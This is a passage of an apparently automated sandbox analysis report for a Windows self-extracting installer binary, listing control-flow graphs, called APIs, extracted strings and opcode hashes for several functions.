                                                        control_flow_graph 1728 7ff7f4d85350-7ff7f4d853d9 call 7ff7f4d84fa8 1731 7ff7f4d853db-7ff7f4d853ff call 7ff7f4d852b8 RaiseException 1728->1731 1732 7ff7f4d85404-7ff7f4d85421 1728->1732 1740 7ff7f4d85608-7ff7f4d85625 1731->1740 1734 7ff7f4d85436-7ff7f4d8543a 1732->1734 1735 7ff7f4d85423-7ff7f4d85434 1732->1735 1736 7ff7f4d8543d-7ff7f4d85449 1734->1736 1735->1736 1738 7ff7f4d8544b-7ff7f4d8545d 1736->1738 1739 7ff7f4d8546a-7ff7f4d8546d 1736->1739 1748 7ff7f4d855d9-7ff7f4d855e3 1738->1748 1749 7ff7f4d85463 1738->1749 1741 7ff7f4d85514-7ff7f4d8551b 1739->1741 1742 7ff7f4d85473-7ff7f4d85476 1739->1742 1744 7ff7f4d8551d-7ff7f4d8552c 1741->1744 1745 7ff7f4d8552f-7ff7f4d85532 1741->1745 1746 7ff7f4d8548d-7ff7f4d854a2 LoadLibraryExA 1742->1746 1747 7ff7f4d85478-7ff7f4d8548b 1742->1747 1744->1745 1750 7ff7f4d85538-7ff7f4d8553c 1745->1750 1751 7ff7f4d855d5 1745->1751 1752 7ff7f4d854f9-7ff7f4d85502 1746->1752 1753 7ff7f4d854a4-7ff7f4d854b7 GetLastError 1746->1753 1747->1746 1747->1752 1760 7ff7f4d855e5-7ff7f4d855f6 1748->1760 1761 7ff7f4d85600 call 7ff7f4d852b8 1748->1761 1749->1739 1758 7ff7f4d8553e-7ff7f4d85542 1750->1758 1759 7ff7f4d8556b-7ff7f4d8557e GetProcAddress 1750->1759 1751->1748 1754 7ff7f4d8550d 1752->1754 1755 7ff7f4d85504-7ff7f4d85507 FreeLibrary 1752->1755 1762 7ff7f4d854ce-7ff7f4d854f4 call 7ff7f4d852b8 RaiseException 1753->1762 1763 7ff7f4d854b9-7ff7f4d854cc 1753->1763 1754->1741 1755->1754 1758->1759 1767 7ff7f4d85544-7ff7f4d8554f 1758->1767 1759->1751 1766 7ff7f4d85580-7ff7f4d85593 GetLastError 1759->1766 1760->1761 1768 7ff7f4d85605 1761->1768 1762->1740 1763->1752 1763->1762 1770 7ff7f4d855aa-7ff7f4d855d1 call 7ff7f4d852b8 RaiseException call 7ff7f4d84fa8 1766->1770 1771 7ff7f4d85595-7ff7f4d855a8 1766->1771 1767->1759 1772 7ff7f4d85551-7ff7f4d85558 1767->1772 1768->1740 1770->1751 1771->1751 1771->1770 1772->1759 1775 7ff7f4d8555a-7ff7f4d8555f 1772->1775 1775->1759 1776 7ff7f4d85561-7ff7f4d85569 1775->1776 1776->1751 1776->1759
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                        • String ID: H
                                                        • API String ID: 282135826-2852464175
                                                        • Opcode ID: 813d2af946dbcc1b467ff82581fe860ff59ffe329b4d6e3d6bcaf1691afa70ed
                                                        • Instruction ID: 83f6009359434ee364a837ba1aedc62c2a1721158b0d03ab5bfcb199cb71bedb
                                                        • Opcode Fuzzy Hash: 813d2af946dbcc1b467ff82581fe860ff59ffe329b4d6e3d6bcaf1691afa70ed
                                                        • Instruction Fuzzy Hash: 07914D32A05B598BFB00EF66D8946BCB3A1BB08B98B854435DF1D17B94EF38E445C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D69CDC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D69254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F4D69389
                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D6A375
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D6A82F
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D6A835
                                                          • Part of subcall function 00007FF7F4D702F8: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7F4D69CBA), ref: 00007FF7F4D70325
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                        • API String ID: 3629253777-3268106645
                                                        • Opcode ID: 0119fbbe3327ba141a7f55d4cd9843eb37e83c3fd0627bc7f4021d3c2ce17c58
                                                        • Instruction ID: 594e1fedd3b237b922d306251ac2c633a78c324c1a6b8b35213b93328f48629f
                                                        • Opcode Fuzzy Hash: 0119fbbe3327ba141a7f55d4cd9843eb37e83c3fd0627bc7f4021d3c2ce17c58
                                                        • Instruction Fuzzy Hash: 0B629D22A19A82E6EB14EF26D4881BDB361FB45788FC05132DB6D477D5EF38E544C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D82FF0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2091 7ff7f4d82ff0-7ff7f4d83033 2092 7ff7f4d83039-7ff7f4d83075 call 7ff7f4d87480 2091->2092 2093 7ff7f4d833a4-7ff7f4d833c9 call 7ff7f4d61b70 call 7ff7f4d85bf0 2091->2093 2099 7ff7f4d8307a-7ff7f4d83081 2092->2099 2100 7ff7f4d83077 2092->2100 2101 7ff7f4d83083-7ff7f4d83087 2099->2101 2102 7ff7f4d83092-7ff7f4d83096 2099->2102 2100->2099 2104 7ff7f4d8308c-7ff7f4d83090 2101->2104 2105 7ff7f4d83089 2101->2105 2106 7ff7f4d8309b-7ff7f4d830a6 2102->2106 2107 7ff7f4d83098 2102->2107 2104->2106 2105->2104 2108 7ff7f4d830ac 2106->2108 2109 7ff7f4d83138 2106->2109 2107->2106 2110 7ff7f4d830b2-7ff7f4d830b9 2108->2110 2111 7ff7f4d8313c-7ff7f4d8313f 2109->2111 2112 7ff7f4d830be-7ff7f4d830c3 2110->2112 2113 7ff7f4d830bb 2110->2113 2114 7ff7f4d83147-7ff7f4d8314a 2111->2114 2115 7ff7f4d83141-7ff7f4d83145 2111->2115 2116 7ff7f4d830f5-7ff7f4d83100 2112->2116 2117 7ff7f4d830c5 2112->2117 2113->2112 2118 7ff7f4d83170-7ff7f4d83183 call 7ff7f4d67b68 2114->2118 2119 7ff7f4d8314c-7ff7f4d83153 2114->2119 2115->2114 2115->2118 2122 7ff7f4d83105-7ff7f4d8310a 2116->2122 2123 7ff7f4d83102 2116->2123 2124 7ff7f4d830da-7ff7f4d830e0 2117->2124 2132 7ff7f4d831a8-7ff7f4d831fd call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d6587c call 7ff7f4d61b70 2118->2132 2133 7ff7f4d83185-7ff7f4d831a3 call 7ff7f4d70a5c 2118->2133 2119->2118 2120 7ff7f4d83155-7ff7f4d8316c 2119->2120 2120->2118 2128 7ff7f4d833ca-7ff7f4d833d1 2122->2128 2129 7ff7f4d83110-7ff7f4d83117 2122->2129 2123->2122 2125 7ff7f4d830c7-7ff7f4d830ce 2124->2125 2126 7ff7f4d830e2 2124->2126 2136 7ff7f4d830d3-7ff7f4d830d8 2125->2136 2137 7ff7f4d830d0 2125->2137 2126->2116 2130 7ff7f4d833d6-7ff7f4d833db 2128->2130 2131 7ff7f4d833d3 2128->2131 2134 7ff7f4d8311c-7ff7f4d83122 2129->2134 2135 7ff7f4d83119 2129->2135 2138 7ff7f4d833ee-7ff7f4d833f6 2130->2138 2139 7ff7f4d833dd-7ff7f4d833e4 2130->2139 2131->2130 2158 7ff7f4d83252-7ff7f4d8325f ShellExecuteExW 2132->2158 2159 7ff7f4d831ff-7ff7f4d8324d call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d672ac call 7ff7f4d61b70 2132->2159 2133->2132 2134->2128 2142 7ff7f4d83128-7ff7f4d83132 2134->2142 2135->2134 2136->2124 2143 7ff7f4d830e4-7ff7f4d830eb 2136->2143 2137->2136 2148 7ff7f4d833fb-7ff7f4d83406 2138->2148 2149 7ff7f4d833f8 2138->2149 2146 7ff7f4d833e9 2139->2146 2147 7ff7f4d833e6 2139->2147 2142->2109 2142->2110 2144 7ff7f4d830ed 2143->2144 2145 7ff7f4d830f0 2143->2145 2144->2145 2145->2116 2146->2138 2147->2146 2148->2111 2149->2148 2161 7ff7f4d83356-7ff7f4d8335e 2158->2161 2162 7ff7f4d83265-7ff7f4d8326f 2158->2162 2159->2158 2164 7ff7f4d83392-7ff7f4d8339f 2161->2164 2165 7ff7f4d83360-7ff7f4d83376 2161->2165 2166 7ff7f4d83271-7ff7f4d83274 2162->2166 2167 7ff7f4d8327f-7ff7f4d83282 2162->2167 2164->2093 2169 7ff7f4d8338d call 7ff7f4d85adc 2165->2169 2170 7ff7f4d83378-7ff7f4d8338b 2165->2170 2166->2167 2171 7ff7f4d83276-7ff7f4d8327d 2166->2171 2172 7ff7f4d8329e-7ff7f4d832bd call 7ff7f4dcf130 call 7ff7f4d838e8 2167->2172 2173 7ff7f4d83284-7ff7f4d8328f call 7ff7f4dcf138 2167->2173 2169->2164 2170->2169 2176 7ff7f4d8340b-7ff7f4d83413 call 7ff7f4d8ae54 2170->2176 2171->2167 2178 7ff7f4d832f3-7ff7f4d83300 CloseHandle 2171->2178 2172->2178 2199 7ff7f4d832bf-7ff7f4d832c2 2172->2199 2173->2172 2186 7ff7f4d83291-7ff7f4d8329c ShowWindow 2173->2186 2184 7ff7f4d83315-7ff7f4d8331c 2178->2184 2185 7ff7f4d83302-7ff7f4d83313 call 7ff7f4d70a5c 2178->2185 2191 7ff7f4d8333e-7ff7f4d83340 2184->2191 2192 7ff7f4d8331e-7ff7f4d83321 2184->2192 2185->2184 2185->2191 2186->2172 2191->2161 2194 7ff7f4d83342-7ff7f4d83345 2191->2194 2192->2191 2193 7ff7f4d83323-7ff7f4d83338 2192->2193 2193->2191 2194->2161 2198 7ff7f4d83347-7ff7f4d83355 ShowWindow 2194->2198 2198->2161 2199->2178 2201 7ff7f4d832c4-7ff7f4d832d5 GetExitCodeProcess 2199->2201 2201->2178 2202 7ff7f4d832d7-7ff7f4d832ec 2201->2202 2202->2178
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                        • String ID: .exe$.inf$Install$p
                                                        • API String ID: 1054546013-3607691742
                                                        • Opcode ID: 429189c49b1a022ab02d4fccaab96c0e9f1cb398093bee8efb5804c0d3894d76
                                                        • Instruction ID: f8d581690a200f75a802398f44e477b063952fe4b8aa155b50aaedd299c8c596
                                                        • Opcode Fuzzy Hash: 429189c49b1a022ab02d4fccaab96c0e9f1cb398093bee8efb5804c0d3894d76
                                                        • Instruction Fuzzy Hash: 40C16E22B18A0296EB14EF26D99427DB3A1BB85B80F884035DB6D477E5DF3DE45183A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D82BB4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                        • String ID:
                                                        • API String ID: 4119318379-0
                                                        • Opcode ID: 69e24ba9009fcb1a64d7301b465f30633956cb9a0fdcdd683f7332429d64cc7a
                                                        • Instruction ID: 795a19dfe972946075a87b42ad511d76ee2a7724186dc0cfdd8fbdb62ece9544
                                                        • Opcode Fuzzy Hash: 69e24ba9009fcb1a64d7301b465f30633956cb9a0fdcdd683f7332429d64cc7a
                                                        • Instruction Fuzzy Hash: 6541CE35B2464287F720AF62E850BE9B361FB49B98F804135DF2A47BE5CE3DD44587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D72154 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 7COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2247 7ff7f4d72154-7ff7f4d72167 call 7ff7f4d8578c
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_
                                                        • String ID: AES-0017$[c^[$map/set too long$z01$zip$zipx$zx01
                                                        • API String ID: 909987262-2988828694
                                                        • Opcode ID: e98891d6ad104e19ab9c5c76874faf8a4a553f04b34342c29c2764dde47c1347
                                                        • Instruction ID: 58e0cdc03f3b26d005e744e07c7091e9a2d27c6bb85a4d0f0cfc4e0b9a17b29c
                                                        • Opcode Fuzzy Hash: e98891d6ad104e19ab9c5c76874faf8a4a553f04b34342c29c2764dde47c1347
                                                        • Instruction Fuzzy Hash: 41B0925890400D82E62CBB82CC9107463209B14740F900C3083288F891093870424256
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D646A0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2301 7ff7f4d646a0-7ff7f4d646db 2302 7ff7f4d646dd-7ff7f4d646e4 2301->2302 2303 7ff7f4d646e6 2301->2303 2302->2303 2304 7ff7f4d646e9-7ff7f4d64758 2302->2304 2303->2304 2305 7ff7f4d6475d-7ff7f4d64788 CreateFileW 2304->2305 2306 7ff7f4d6475a 2304->2306 2307 7ff7f4d6478e-7ff7f4d647be GetLastError call 7ff7f4d680b0 2305->2307 2308 7ff7f4d64868-7ff7f4d6486d 2305->2308 2306->2305 2317 7ff7f4d6480c 2307->2317 2318 7ff7f4d647c0-7ff7f4d6480a CreateFileW GetLastError 2307->2318 2309 7ff7f4d64873-7ff7f4d64877 2308->2309 2311 7ff7f4d64879-7ff7f4d6487c 2309->2311 2312 7ff7f4d64885-7ff7f4d64889 2309->2312 2311->2312 2314 7ff7f4d6487e 2311->2314 2315 7ff7f4d6488b-7ff7f4d6488f 2312->2315 2316 7ff7f4d648af-7ff7f4d648c3 2312->2316 2314->2312 2315->2316 2320 7ff7f4d64891-7ff7f4d648a9 SetFileTime 2315->2320 2321 7ff7f4d648ec-7ff7f4d64915 call 7ff7f4d85bf0 2316->2321 2322 7ff7f4d648c5-7ff7f4d648d0 2316->2322 2319 7ff7f4d64812-7ff7f4d6481a 2317->2319 2318->2319 2323 7ff7f4d6481c-7ff7f4d64833 2319->2323 2324 7ff7f4d64853-7ff7f4d64866 2319->2324 2320->2316 2326 7ff7f4d648e8 2322->2326 2327 7ff7f4d648d2-7ff7f4d648da 2322->2327 2330 7ff7f4d6484e call 7ff7f4d85adc 2323->2330 2331 7ff7f4d64835-7ff7f4d64848 2323->2331 2324->2309 2326->2321 2328 7ff7f4d648dc 2327->2328 2329 7ff7f4d648df-7ff7f4d648e3 call 7ff7f4d61c80 2327->2329 2328->2329 2329->2326 2330->2324 2331->2330 2334 7ff7f4d64916-7ff7f4d6491b call 7ff7f4d8ae54 2331->2334
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3536497005-0
                                                        • Opcode ID: 39edef82397ba72a43b4f373ecc1f356af9409ce81394d3c0888f0e682ff87ce
                                                        • Instruction ID: 05be47834f1ebd67bad36b1b85039e30d3154b2d872029aa0186ebbefea2a2b1
                                                        • Opcode Fuzzy Hash: 39edef82397ba72a43b4f373ecc1f356af9409ce81394d3c0888f0e682ff87ce
                                                        • Instruction Fuzzy Hash: DB61C366A19B8196E7209F2AE48036EB7A1B7857A8F501334DFBD03AD4CF3DD094C794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6E77C Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: e045fec339b82cfcbd76d1d976abdda53ec1060d8e03499549cf22dc3b3cc608
                                                        • Instruction ID: a550c0849e1e13424cf3447d36881a6674753e50f1cc50e2a2ec81ee36e638d4
                                                        • Opcode Fuzzy Hash: e045fec339b82cfcbd76d1d976abdda53ec1060d8e03499549cf22dc3b3cc608
                                                        • Instruction Fuzzy Hash: 1E314962B10A55DAFB00DFB6D8801AC7370FB18758B94503AEF1DA3A98EA38D495C350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D837D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2348 7ff7f4d837d0-7ff7f4d837fb 2349 7ff7f4d837fd 2348->2349 2350 7ff7f4d83800-7ff7f4d8383a SetEnvironmentVariableW call 7ff7f4d6cf94 2348->2350 2349->2350 2353 7ff7f4d8383c 2350->2353 2354 7ff7f4d83887-7ff7f4d8388f 2350->2354 2355 7ff7f4d83840-7ff7f4d83848 2353->2355 2356 7ff7f4d838c3-7ff7f4d838de call 7ff7f4d85bf0 2354->2356 2357 7ff7f4d83891-7ff7f4d838a7 2354->2357 2359 7ff7f4d8384d-7ff7f4d83858 call 7ff7f4d6d374 2355->2359 2360 7ff7f4d8384a 2355->2360 2361 7ff7f4d838be call 7ff7f4d85adc 2357->2361 2362 7ff7f4d838a9-7ff7f4d838bc 2357->2362 2370 7ff7f4d8385a-7ff7f4d83865 2359->2370 2371 7ff7f4d83867-7ff7f4d8386c 2359->2371 2360->2359 2361->2356 2362->2361 2365 7ff7f4d838df-7ff7f4d838e7 call 7ff7f4d8ae54 2362->2365 2370->2355 2372 7ff7f4d8386e 2371->2372 2373 7ff7f4d83871-7ff7f4d83886 SetEnvironmentVariableW 2371->2373 2372->2373 2373->2354
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                        • String ID: sfxcmd$sfxpar
                                                        • API String ID: 3540648995-3493335439
                                                        • Opcode ID: 2bc299da20fbec87d704cc9bab44ddf9c5bd5a2a6beedb7dd826ddad9008950f
                                                        • Instruction ID: 099624d814b7de609d3745b46211a90618794e614b8e6c88009325edf43175b0
                                                        • Opcode Fuzzy Hash: 2bc299da20fbec87d704cc9bab44ddf9c5bd5a2a6beedb7dd826ddad9008950f
                                                        • Instruction Fuzzy Hash: 18317262A14A4985EF04AF6AE8C41BCB371FB48B98F840135DF6D17BE5CE38D041C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7EB24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadBitmapW.USER32 ref: 00007FF7F4D7EB3A
                                                        • GetObjectW.GDI32 ref: 00007FF7F4D7EB6B
                                                        • DeleteObject.GDI32 ref: 00007FF7F4D7EBA5
                                                        • DeleteObject.GDI32 ref: 00007FF7F4D7EBD5
                                                          • Part of subcall function 00007FF7F4D7C220: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C239
                                                          • Part of subcall function 00007FF7F4D7C220: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C255
                                                          • Part of subcall function 00007FF7F4D7C220: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C26F
                                                          • Part of subcall function 00007FF7F4D7C220: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C281
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalAlloc.KERNELBASE ref: 00007FF7F4D7C2A2
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalLock.KERNEL32 ref: 00007FF7F4D7C2B7
                                                          • Part of subcall function 00007FF7F4D7C220: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7F4D7C365
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalUnlock.KERNEL32 ref: 00007FF7F4D7C388
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalFree.KERNEL32 ref: 00007FF7F4D7C391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
